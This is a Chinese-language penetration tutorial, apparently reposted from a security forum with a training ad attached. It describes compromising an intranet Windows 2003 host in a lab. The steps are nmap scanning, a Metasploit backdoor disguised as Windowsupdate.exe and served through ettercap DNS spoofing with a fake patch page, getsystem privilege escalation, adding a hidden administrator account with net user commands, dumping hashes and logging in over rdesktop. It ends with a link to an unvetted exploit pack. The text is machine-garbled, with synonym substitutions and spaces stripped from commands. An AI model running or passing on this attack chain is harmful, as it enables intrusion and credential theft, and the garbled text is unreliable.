服务器联防(服务器联动是什么意思)「服务器上联」

  本机ubuntuIP:192.168.0.3

  假造机03主机IP:192.168.0.128

  我们先来模仿一下比如我拿到了我本机192.168.0.3这台服务器的管理权限后我是怎样继承渗出192.168.0.128这台主机的起首在内网渗出中最常用的就是信息网络以及端口扫描提及端口扫描和主机信息网络各人不得不想到了nmap

  nmap

  nmap是一个网络毗连端扫描软件,用来扫描网上电脑开放的网络毗连端。确定哪些服务运行在哪些毗连端,而且推断盘算机运行哪个操纵体系(这是亦称fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络体系安全。

  正如大多数被用于网络安全的工具,nmap也是不少黑客及骇客(又称脚本小子)爱用的工具。体系管理员可以利用nmap来探测工作环境中未经答应利用的服务器,但是黑客会利用nmap来搜集目标电脑的网络设定,从而筹划攻击的方法。

  Nmap常被跟评估体系弊端软件Nessus等量齐观。Nmap以秘密的伎俩,避开突入检测体系的监督,并尽大概不影响目标体系的一样平常操纵。

  Nmap在黑客帝国(TheMatrix)中,连同SSH1的32位元循环冗余校验弊端,被崔妮蒂用以入侵发电站的能源管理体系。

  别的更多nmap相干信息请到百度百科查察太多全搬过来的话界面就不是特别雅观了https://baike.baidu.com/link?url=iKwQ4Q3iLG8zBo5mWA4z_GQ-vvFmqFjgi70x5PzDy0rn68KHQ5qyAZgdxv9Yf22aurOik7eAb2o2o_SYbGrKiq

  我们用nmap的Intensescan模块来扫描192.168.0.128这台主机是在内网中扫描端口开放信息以及主机信息等一系列信息~Intensescan模块可以满意一样平常的扫描假如你要扫描内网主机的话nmap192.168.0.1/24即可192.168.0.1是我的路由器地点

  nmap-T4-A-v192.168.0.128

  这里我们不得不说一下nmap确实很强大下面为输出结果

  我们得知主机体系为Windows2003用户组版本信息端口信息开放了3389固然nmap有很多插件可以扫描主机弊端题目谁人我没找到==

  咳咳设置Metasploitexe后门

  ps:默认端口4444

  有的主机可以共同Metasploit溢出渗出xp那样直接获取到一个cmd实行权限本台主机我看了下没有长途溢出题目补丁都打好了。

  主机开放3389后而且是在内网那么我们dns诱骗内网全部主机的dns我们写一个html界面提示你电脑存在xx弊端打补丁后门改名字可以改为Windowsupdate.exehtml界面越逼真越好。

  ettercap-T-iwlp2s0-q-Pdns_spoof//////

  下面为输出结果参数题目:

  -T文本模式-i接要诱骗的适配器-q安静模式-Pdns_spoof调用这个插件//////代表全部IP和子网掩码

服务器联防(服务器联动是什么意思) 服务器联防(服务器联动是什么意思)「服务器上联」 行业资讯

  对方主机打开任何网站都会成为我本机的index.html

  Linux的index.html在/var/www/html/目次

  直接gedit/var/www/html/index.html即可编辑

  起首你要先辈入root状态

  否则只能读不能写

  上面说了03主机是受害者这里我假冒被骗了

  打开了后门

  这里我们的msf上线了

  资助信息

  

  起首我们先来读取下192.168.0.128这台主机的hash数值

  固然这些数值不好解密咳咳

  有提权exp可以直接表现hash值解密后的

  getsystem获取最高权限

服务器联防(服务器联动是什么意思) 服务器联防(服务器联动是什么意思)「服务器上联」 行业资讯

  shell进入cmd提权

  我们乐成获取到了最高权限进入到了c盘Windowssystem32的cmd.exe直接一条下令即可添加用户管理员权限

  netuserxaisecxaisec/addnetlocalgroupadministratorsxaisec/add

  毗连192.168.0.128这台主机rdesktop

  没有rdesktop的可以apt-getinstallrdesktop安装

  rdesktop-h参数

  rdesktop192.168.0.128-uxaisec-pxaisec

  -u是用户名的意思-p是暗码

  读取解密哈希值

  hash下

  administratoradmin

  xaisecxaisec

  利用administrator登录

  rdesktop192.168.0.128-uadministrator-padmin

  末了我整理了下提权exp有的没有测试不清楚有没有后门自行查抄

  链接:https://pan.baidu.com/s/1i56zH0T暗码:qdhm

  作者:小爱_Joker

  泉源:i春秋

  链接:https://bbs.ichunqiu.com/thread-20514-1-1.html

炼石信息安全培训春季班开招

QQ:495066536

372806985

敬请连续关注……

客户评论

我要评论